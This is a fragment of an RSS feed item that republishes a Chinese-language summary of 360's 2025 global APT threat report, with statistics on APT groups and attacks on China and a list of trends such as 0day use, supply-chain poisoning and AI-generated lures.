data-value="3"></mp-style-type></p>


<p><a href="%27%27">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7fc7086d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247507801%26idx%3D1%26sn%3De169339f921fd11a2fef8dfe068e616c">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 06 Feb 2026 17:51:00 +0800</pubDate>
    </item>
    <item>
      <title>《2025年全球高级持续性威胁（APT）研究报告》</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507800&amp;idx=1&amp;sn=45494ff2fd1abf277f95315267dc91a9</link>
      <description>如约而至</description>
      <content:encoded><![CDATA[<p>原创 <span>高级威胁研究院</span> <span>2026-01-30 13:07</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=adfa3144&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6CNEHNicic4PqKGprsXUlMgrROF4bHwB3TdugF2bHx38iaGQT6assp4bdlRyFHA8Sgd2ggzRtdgm2yDaf5JI2J6yQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>如约而至</p>
  <p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100024146" data-ratio="1.3884393063583815" data-s="300,640" type="block" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=b98d672c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqKGprsXUlMgrROF4bHwB3TKMsHrB5TPvff67F3fricqia3CmwawjFGibmQ4xfx7yqjuD9HBUdKrDPNA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 16px;margin-top: 16px;" data-mpa-action-id="ml0ecbqsucg" data-pm-slice="0 0 []"><span mpa-font-style="ml0ep2m5o6f" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><b><span lang="EN-US" style="font-size: 20pt;color: rgb(14, 65, 225);"><span leaf="" style="font-size: 20px;"><span textstyle="" style="letter-spacing: normal;">2025</span></span></span></b><b><span style="font-size: 20pt;color: rgb(14, 65, 225);"><span leaf="" style="font-size: 20px;"><span textstyle="" style="letter-spacing: normal;">年全球⾼级可持续性威胁形势概览</span></span></span></b></span></p><p style="margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span mpa-font-style="ml0ep2m51k0p" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span lang="EN-US"><span leaf="">2025</span></span><span leaf="">年，世界政治经济格局进⼊深刻演变期，传统秩序加速调整，新兴⼒量加快崛起。全球范围内冲突与博弈显著增多，地缘冲突在多地区凸显，多极化进程在曲折中持续向前。与此同时，⽹络安全态势正经历深刻演进，已从“技术层⾯对抗”升级为关乎国家⽣存与发展的战略博弈。我国⽹络空间安全⾯临复杂严峻挑战：境外国家级</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">攻击持续不断，⼈⼯智能驱动的新型攻击与供应链渗透⻛险集中显现，⿊⾊产业链助推勒索攻击与数据泄露趋于产业化，⽹络空间防御体系承受全⽅位压⼒。</span></span></p><p style="margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span mpa-font-style="ml0ep2m5q7" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span lang="EN-US"><span leaf="">2025</span></span><span leaf="">年，全球⽹络安全⼚商和机构</span><b style=""><span leaf="">累计发布</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">报告</span><span lang="EN-US"><span leaf="">700</span></span><span leaf="">多篇，报告涉及</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">组织</span><span lang="EN-US"><span leaf="">140</span></span><span leaf="">个，其中属于⾸次披露的</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">组织</span><span lang="EN-US"><span leaf="">42</span></span><span leaf="">个</span></b><span leaf="">，⽐</span><span lang="EN-US"><span leaf="">2024</span></span><span leaf="">年同期均呈现⼀定程度增加。从全球范围看，</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">组织攻击活动聚焦地区政治、经济等时事热点，攻击⽬标集中分布于</span><b style=""><span leaf="">政府机构、国防军⼯、信息技术、⾦融、教育</span></b><span leaf="">等⼗⼏个重点⾏业领域。当前，国家层⾯的⽹络攻防对抗不再局限于传统安全范畴，已经逐渐成为国家战略体系中不可或缺的组成部分。</span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100024147" data-ratio="1.4361111111111111" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=dbf251cf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqKGprsXUlMgrROF4bHwB3TpRefic6O5V6iagkk6gXDN7zS290MUSNnuPPPSJQ1sM4hoKzoayficIDaQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" data-mpa-action-id="ml0eeglc1wt4" data-pm-slice="0 0 []"><span mpa-font-style="ml0ep2m51mxo" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-style: italic;font-size: 16px;"><span leaf="" mpa-font-style="ml0eyulr1lws" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">2025</span></span><span mpa-font-style="ml0eyulr1edg" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf=""><span textstyle="" style="font-style: italic;">年全球典型</span></span><span lang="EN-US"><span leaf=""><span textstyle="" style="font-style: italic;">APT</span></span></span></span><span style="font-style: italic;font-size: 16px;"><span leaf="">组织活跃度情况</span></span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span mpa-font-style="ml0eyulr12uj" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">2025</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">年</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">，</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">360</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">再次捕获并披露了到</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">4</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">个全新</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">APT</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">组织</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">，</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">分别为北美地区的</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">APT-C-78</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">、</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">东亚地区的</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">APT-C-64</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">（</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">匿名者</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">64</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">）、</span></span><span lang="EN-US"><span leaf=""><span textstyle="" style="font-weight: bold;">APT-C-67</span></span></span><span leaf=""><span textstyle="" style="font-weight: bold;">（</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">乌苏拉</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">）</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">和南亚地区的</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">APT-C-76</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">（</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">银环蛇</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">）。</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">截⾄</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">2025</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">年底</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">，</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">360</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">已累计率先发现并披露了</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">60</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">个境外</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-weight: bold;">APT</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">组织</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">。</span></span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span mpa-font-style="ml0eyulr1c68" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style=""><span leaf="">依托</span></span><span lang="EN-US" style=""><span leaf="">360</span></span><span style=""><span leaf="">安全⼤模型</span></span><span style=""><span leaf="">，</span></span><span lang="EN-US" style=""><span leaf="">360</span></span><span style=""><span leaf="">⾼级威胁研究院在</span></span><span lang="EN-US" style=""><span leaf="">2025</span></span><span style=""><span leaf="">年</span></span><span style=""><span leaf="">，</span></span><span style=""><span leaf="">累计捕获到</span></span><span lang="EN-US" style=""><span leaf="">1300</span></span><span style=""><span leaf="">余起针对我国的</span></span><span lang="EN-US" style=""><span leaf="">APT</span></span><span style=""><span leaf="">攻击活动</span></span><span style=""><span leaf="">。</span></span><span style=""><span leaf="">相关</span></span><span lang="EN-US" style=""><span leaf="">APT</span></span><span style=""><span leaf="">组织主要来⾃北美</span></span><span style=""><span leaf="">、</span></span><span style=""><span leaf="">东亚</span></span><span style=""><span leaf="">、</span></span><span style=""><span leaf="">南亚</span></span><span style=""><span leaf="">、</span></span><span style=""><span leaf="">东南亚等地区</span></span><span style=""><span leaf="">。</span></span><span style=""><span leaf="">我国受攻击活动影响的单位主要分布于</span><b style=""><span leaf="">政府机构</span></b></span><b style=""><span style=""><span leaf="">、</span></span></b><b style=""><span style=""><span leaf="">教育</span></span></b><b style=""><span style=""><span leaf="">、</span></span></b><b style=""><span style=""><span leaf="">科研</span></span></b><b style=""><span style=""><span leaf="">、</span></span></b><b style=""><span style=""><span leaf="">国防军⼯</span></span></b><b style=""><span style=""><span leaf="">、</span></span></b><b style=""><span style=""><span leaf="">制造</span></span></b><span style=""><span leaf="">等</span></span><span lang="EN-US" style=""><span leaf="">15</span></span><span style=""><span leaf="">个重点⾏业领域</span></span><span style=""><span leaf="">。</span></span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100024148" data-ratio="0.711737089201878" data-s="300,640" type="block" data-type="png" data-w="1065" src="https://wechat2rss.xlab.app/img-proxy/?k=64680f0d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqKGprsXUlMgrROF4bHwB3TpXaRR2OAYo5BjYAXomgb6TA64Asx3CsicqU5yjRfEtNCoh04w7Dpa8Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" data-mpa-action-id="ml0edp8o3ry" data-pm-slice="0 0 []"><span mpa-font-style="ml0ep2m51hfr" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="ml0eyulrbxd"><span leaf=""><span textstyle="" style="font-style: italic;">2025</span></span><span style=""><span leaf=""><span textstyle="" style="font-style: italic;">年攻击活动影响我国的</span></span></span><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="font-style: italic;">TOP 10 APT</span></span></span></span><span style=""><span style="font-size: 16px;"><span style="font-style: italic;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="ml0eyulr22xg"><span leaf="">组织</span></span></span></span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6324074074074074" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100024149" src="https://wechat2rss.xlab.app/img-proxy/?k=72b0ae40&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqKGprsXUlMgrROF4bHwB3TdKmwoUgMQH7ia1vqK46N3ax27qlcm7Hbc2r5Fqr379LtbXicY6mrXzzA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" data-mpa-action-id="ml0edlglrld" data-pm-slice="0 0 []"><span mpa-font-style="ml0ep2m5as9" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-mpa-action-id="ml0eybhb7r4" data-pm-slice="0 0 []"><span style="font-size: 16px;"><span style="font-style: italic;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="ml0eybgvlkp"><span leaf="">2025</span></span><span mpa-font-style="ml0eybgv1ol0" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-style: italic;">年我国受</span></span><span lang="EN-US"><span leaf=""><span textstyle="" style="font-style: italic;">APT</span></span></span><span leaf=""><span textstyle="" style="font-style: italic;">攻击影响单位行业分布</span></span></span></span><span lang="EN-US"><span style="font-size: 16px;"><span style="font-style: italic;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="ml0eybgv123n"><span leaf="">TOP 10</span></span></span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span mpa-font-style="ml0ep2m59sm" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span lang="EN-US"><span leaf="">2025</span></span><span leaf="">年，北美和我国台湾省地区的</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">组织活跃度较往年明显增加，这与中美政博弈、台海局势发展密切相关。来⾃北美地区的</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">攻击技战术⽔平⾼超，主要针对我国重点科研和关基单位，造成的影响和危害极⼤；来⾃我国台湾省地区的</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">组织主要针对我国政府机构和教育科研等领域展开钓⻥攻击，从⽽进⾏渗透和窃密。</span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;" data-mpa-action-id="ml0ec43e16od" data-pm-slice="0 0 []"><span mpa-font-style="ml0ep2m51osl" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><b><span lang="EN-US" style="font-size: 20pt;color: rgb(14, 65, 225);"><span leaf="" style="font-size: 20px;">2025</span></span></b><b><span style="font-size: 20pt;color: rgb(14, 65, 225);"><span style="font-size: 20px;"><span leaf="">年</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">攻击威胁发展趋势</span></span></span></b></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span style="font-size: 12pt;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="ml0ep2m51p5o"><span style="font-weight: bold;font-size: 17px;"><span leaf="">一、</span></span><span style="font-size: 17px;"><span lang="EN-US"><span leaf=""><span textstyle="" style="font-weight: bold;">0day</span></span></span><span leaf=""><span textstyle="" style="font-weight: bold;">漏洞的利用数量持续增长</span></span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="ml0ep2m51kw6"><span leaf="">针对我国境内网络设施的</span><span lang="EN-US"><span leaf="">0day</span></span><span leaf="">攻击持续攀升，仅被利用的通用型漏洞就涵盖从压缩工具、邮件系统到安全终端及办公软件等多个关键领域。据统计，全年全球</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">攻击活动中影响较大的</span><span lang="EN-US"><span leaf="">0day</span></span><span leaf="">漏洞共计</span><span lang="EN-US"><span leaf="">42</span></span><span leaf="">个，覆盖</span><span lang="EN-US"><span leaf="">iOS</span></span><span leaf="">、</span><span lang="EN-US"><span leaf="">Windows</span></span><span leaf="">、</span><span lang="EN-US"><span leaf="">Android</span></span><span leaf="">、</span><span lang="EN-US"><span leaf="">Chrome</span></span><span leaf="">以及</span><span lang="EN-US"><span leaf="">VMware</span></span><span leaf="">等主流系统平台。</span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="ml0ep2m54so"><span leaf=""><span textstyle="" style="font-weight: bold;">二、利用开源代码仓库作为供应链攻击跳板</span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span mpa-font-style="ml0ep2m5cc5" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span lang="EN-US" style=""><span leaf="">APT-C-00</span></span><span style=""><span leaf="">（海莲花）的钓鱼攻击、</span><span lang="EN-US"><span leaf="">APT-C-26</span></span><span leaf="">（</span><span lang="EN-US"><span leaf="">Lazarus</span></span><span leaf="">）的虚假面试行动等多起</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">攻击均利用开源代码仓库（如</span><span lang="EN-US"><span leaf="">GitHub</span></span><span leaf="">、</span><span lang="EN-US"><span leaf="">NPM</span></span><span leaf="">）展开供应链投毒攻击。此类攻击利用开源仓库的信任机制，通过投毒项目或劫持账户实施隐蔽的供应链感染，其级联效应可穿透开发至生产全链路，其根源在于开源生态的开放性与开发过程中安全审查的不足。</span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span mpa-font-style="ml0ep2m51gvu" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">三、</span></span><span lang="EN-US"><span leaf=""><span textstyle="" style="font-weight: bold;">AI</span></span></span><span leaf=""><span textstyle="" style="font-weight: bold;">技术被应</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">⽤</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">在深度伪造和诱饵制作等场景</span></span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span mpa-font-style="ml0ep2m59wq" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span lang="EN-US" style=""><span leaf="">AI</span></span><span style=""><span leaf="">技术的应用显著提升了</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">组织在社会工程学调研和攻击的效率，使其能够快速构造跨语言、跨文化、跨行业的精准诱饵。</span><span lang="EN-US"><span leaf="">2025</span></span><span leaf="">年中，</span><span lang="EN-US"><span leaf="">APT-C-26</span></span><span leaf="">（</span><span lang="EN-US"><span leaf="">Lazarus</span></span><span leaf="">）、</span><span lang="EN-US"><span leaf="">APT-C-47</span></span><span leaf="">（旺刺）等组织已广泛利用大模型进行深度伪造、生成虚假面试与会议邀请，推动钓鱼攻击从</span><span lang="EN-US"><span leaf="">“</span></span><span leaf="">广撒网</span><span lang="EN-US"><span leaf="">”</span></span><span leaf="">向</span><span lang="EN-US"><span leaf="">“</span></span><span leaf="">精准制导</span><span lang="EN-US"><span leaf="">”</span></span><span leaf="">升级，甚至实现交互式欺骗。这类</span><span lang="EN-US"><span leaf="">AI</span></span><span leaf="">驱动的攻击大幅降低了实施门槛，同时提升了隐蔽性与危害性。</span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span mpa-font-style="ml0ep2m5a99" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">四、</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">⽹</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">络攻击成为地缘政治</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">⼯</span></span></span><span style=""><span leaf=""><span textstyle="" style="font-weight: bold;">具</span></span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span mpa-font-style="ml0ep2m51x3l" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">当前地缘政治格局下，网络空间对抗已深度融入国家间战略博弈与军事行动，成为实现政</span><span style=""><span leaf="">治与军事目标的关键手段。从</span><span lang="EN-US"><span leaf="">2025</span></span><span leaf="">年底委内瑞拉国家石油公司遭勒索软件攻击致业务中断，到</span><span lang="EN-US"><span leaf="">2026</span></span><span leaf="">年初美军行动中伴随的网络断电打击；从俄乌冲突中东欧</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">组织对政府、媒体及基础设施的持续破坏与情报窃取，到伊以对抗中网络技术支撑的精准定位与清除行动，均清晰表明：网络攻击已超越技术范畴，其低成本、高隐蔽、强破坏的特性正深刻改变现代战争形态。</span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="ml0ep2m55ks"><span leaf=""><span textstyle="" style="font-weight: bold;">五、针对驻外机构的网络攻击威胁增多</span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="ml0ep2m5177n"><span leaf="">近年来，我国驻外使领馆、企业及文化机构已成为国家级</span><span lang="EN-US"><span leaf="">APT</span></span><span leaf="">组织的优先攻击目标，攻击频次与战术复杂性显著上升。在重大外事活动期间，相关攻击尤为活跃，目标直指邮件系统、内部文档及外交决策信息，并已扩展至人员个人设备。攻击动机集中于窃取外交、军事及经贸核心情报，并意图施加外交压力。这一趋势与中美战略博弈加剧、地区冲突外溢以及我国全球治理参与度提升密切相关</span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="ml0ep2m51b0"><span leaf=""><span textstyle="" style="font-weight: bold;">六、国产化应用，信创基础设施威胁凸显</span></span></span></p><p style="margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;"><span style="font-size: 12pt;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="ml0ep2m52r1"><span leaf="" style="font-size: 17px;">随着我国国产化替代进入关键期，攻击者通过利用国产软件漏洞、实施供应链渗透等手段，对关键领域展开持续精准渗透攻击。面对这一关乎数字主权的安全博弈，必须坚持技术创新与安全防护并重，筑牢信创体系的安全底座。</span></span></p><p style=""><span style="font-size: 12.0pt;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;mso-bidi-font-family: 宋体;mso-font-kerning: 0pt;" 